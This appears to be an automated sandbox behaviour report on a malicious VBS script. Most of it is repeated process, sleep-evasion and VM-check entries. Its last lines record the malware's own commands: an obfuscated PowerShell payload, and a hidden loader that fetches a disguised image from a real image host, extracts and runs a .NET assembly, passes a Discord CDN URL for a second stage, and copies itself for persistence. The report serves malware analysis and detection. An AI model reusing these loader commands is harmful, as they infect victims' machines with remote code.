        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1726Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1528Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4025Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5735Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2783Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5844Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1444Thread sleep count: 4025 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5088Thread sleep count: 5735 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564Thread sleep time: -15679732462653109s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep count: 2783 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep count: 345 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3260Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWengineer-
        Source: wscript.exe, 00000000.00000003.2119987319.00000185E8893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8893000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000000.00000002.2126200279.00000185E88A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.96.3 443Jump to behavior
        Source: Yara matchFile source: amsi64_616.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2672, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 616, type: MEMORYSTR
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbsJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhd
